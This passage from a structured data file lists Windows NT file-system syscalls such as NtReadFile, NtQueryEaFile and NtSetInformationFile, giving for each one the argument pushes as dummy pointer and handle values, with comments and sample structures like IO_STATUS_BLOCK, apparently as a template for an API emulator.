\"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ApcContext (None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PIO_APC_ROUTINE ApcRoutine (None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE Event (None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct165\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Length in bytes of the string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd00e0\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct166\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation status (initialized to 0)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation information (initialized to 0)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryEaFile\": {\r\n \"ntFunc\": \"NtQueryEaFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN RestartScan (FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to ULONG EaIndex (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG EaListLength (32 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to EaList buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN ReturnSingleEntry (FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG Length (4096 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to Buffer for EA data (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct166\",\r\n \"structureValueExpectations\": \"Status and information fields for the I/O operation.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct166\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation status (initialized to 0)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation information (initialized to 0)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryFullAttributesFile\": {\r\n \"ntFunc\": \"NtQueryFullAttributesFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to FILE_NETWORK_OPEN_INFORMATION (dummy pointer)\",\r\n \"structurePointer\": \"FILE_NETWORK_OPEN_INFORMATION\",\r\n \"structureRef\": \"struct167\",\r\n \"structureValueExpectations\": \"Network open information for the file (timestamps, size, attributes, etc).\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct164\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct167\": {\r\n \"type\": \"FILE_NETWORK_OPEN_INFORMATION\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"CreationTime\",\r\n \"fieldType\": \"LARGE_INTEGER\",\r\n \"fieldValue\": \"0x01D8E3B5A2B0000\",\r\n \"fieldComment\": \"Sample file creation time\"\r\n },\r\n {\r\n \"fieldName\": \"LastAccessTime\",\r\n \"fieldType\": \"LARGE_INTEGER\",\r\n \"fieldValue\": \"0x01D8E3B5A2B1000\",\r\n \"fieldComment\": \"Sample last access time\"\r\n },\r\n {\r\n \"fieldName\": \"LastWriteTime\",\r\n \"fieldType\": \"LARGE_INTEGER\",\r\n \"fieldValue\": \"0x01D8E3B5A2B2000\",\r\n \"fieldComment\": \"Sample last write time\"\r\n },\r\n {\r\n \"fieldName\": \"ChangeTime\",\r\n \"fieldType\": \"LARGE_INTEGER\",\r\n \"fieldValue\": \"0x01D8E3B5A2B3000\",\r\n \"fieldComment\": \"Sample change time\"\r\n },\r\n {\r\n \"fieldName\": \"AllocationSize\",\r\n \"fieldType\": \"LARGE_INTEGER\",\r\n \"fieldValue\": \"0x00002000\",\r\n \"fieldComment\": \"Sample allocation size\"\r\n },\r\n {\r\n \"fieldName\": \"EndOfFile\",\r\n \"fieldType\": \"LARGE_INTEGER\",\r\n \"fieldValue\": \"0x00001800\",\r\n \"fieldComment\": \"Sample end of file\"\r\n },\r\n {\r\n \"fieldName\": \"FileAttributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"FILE_ATTRIBUTE_ARCHIVE\"\r\n }\r\n ]\r\n },\r\n \"struct164\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd00d0\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryInformationFile\": {\r\n \"ntFunc\": \"NtQueryInformationFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000005\",\r\n \"additionalComment\": \"FILE_INFORMATION_CLASS FileInformationClass (FileStandardInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"ULONG Length (256 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to buffer for FileInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct166\",\r\n \"structureValueExpectations\": \"Status and information fields for the I/O operation.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct166\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation status (initialized to 0)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation information (initialized to 0)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryOleDirectoryFile\": {\r\n \"ntFunc\": \"NtQueryOleDirectoryFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN RestartScan (FALSE, typical for initial query)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PUNICODE_STRING FileMask (None, no mask applied)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN ReturnSingleEntry (FALSE, return all entries)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"FILE_INFORMATION_CLASS FileDirectoryInformation\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG Length (4096 bytes, typical buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"PVOID FileInformation (dummy pointer to output buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct168\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O result.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ApcContext (None, no APC context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PIO_APC_ROUTINE ApcRoutine (None, no APC routine)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE Event (None, synchronous operation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct168\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS (initial value)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Number of bytes transferred (initial value)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryVolumeInformationFile\": {\r\n \"ntFunc\": \"NtQueryVolumeInformationFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"FS_INFORMATION_CLASS FileFsVolumeInformation\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000200\",\r\n \"additionalComment\": \"ULONG Length (512 bytes, typical buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"PVOID FsInformation (dummy pointer to output buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct169\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O result.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct169\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS (initial value)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Number of bytes transferred (initial value)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtReadFile\": {\r\n \"ntFunc\": \"NtReadFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PULONG Key (None, not used for synchronous I/O)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLARGE_INTEGER ByteOffset (None, read from current file position)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"ULONG Length (256 bytes to read)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"PVOID Buffer (dummy pointer to read buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct170\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O result.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ApcContext (None, no APC context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PIO_APC_ROUTINE ApcRoutine (None, no APC routine)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE Event (None, synchronous operation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct170\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS (initial value)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Number of bytes transferred (initial value)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtReadFileScatter\": {\r\n \"ntFunc\": \"NtReadFileScatter\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PULONG Key (None, not used for synchronous I/O)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLARGE_INTEGER ByteOffset (None, read from current file position)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000200\",\r\n \"additionalComment\": \"ULONG Length (512 bytes to read)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"FILE_SEGMENT_ELEMENT SegmentArray (dummy pointer to segment array)\",\r\n \"structurePointer\": \"FILE_SEGMENT_ELEMENT\",\r\n \"structureRef\": \"struct171\",\r\n \"structureValueExpectations\": \"Array of segment elements for scatter read.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct172\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O result.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ApcContext (None, no APC context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PIO_APC_ROUTINE ApcRoutine (None, no APC routine)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE Event (None, synchronous operation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct171\": {\r\n \"type\": \"FILE_SEGMENT_ELEMENT\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0xbadd00a0\",\r\n \"fieldComment\": \"Dummy pointer to segment buffer\"\r\n }\r\n ]\r\n },\r\n \"struct172\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS (initial value)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Number of bytes transferred (initial value)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtSetEaFile\": {\r\n \"ntFunc\": \"NtSetEaFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG EaBufferSize (32 bytes, typical small EA buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"PVOID EaBuffer (dummy pointer to EA buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct173\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O result.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct173\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS (initial value)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Number of bytes transferred (initial value)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtSetInformationFile\": {\r\n \"ntFunc\": \"NtSetInformationFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"FileInformationClass: FileDispositionInformation\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000008\",\r\n \"additionalComment\": \"Length: 8 bytes (typical for FILE_DISPOSITION_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to FILE_DISPOSITION_INFORMATION (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct174\",\r\n \"structureValueExpectations\": \"Status and Information fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct174\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation status (success)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000008\",\r\n \"fieldComment\": \"Number of bytes processed\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtSetVolumeInformationFile\": {\r\n \"ntFunc\": \"NtSetVolumeInformationFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"FileSystemInformationClass: FileFsLabelInformation\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"Length: 32 bytes (typical for FS label info)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to FILE_FS_LABEL_INFORMATION (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0070\"\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct175\",\r\n \"structureValueExpectations\": \"Status and Information fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000445\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct175\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation status (success)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"Number of bytes processed\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtUnlockFile\": {\r\n \"ntFunc\": \"NtUnlockFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Key: 0 (no key used)\",\r\n \"structurePointer\": 